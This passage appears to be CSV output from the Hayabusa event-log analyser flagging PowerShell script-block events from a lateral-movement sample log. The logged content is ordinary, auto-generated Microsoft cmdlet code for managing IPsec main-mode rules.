} Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
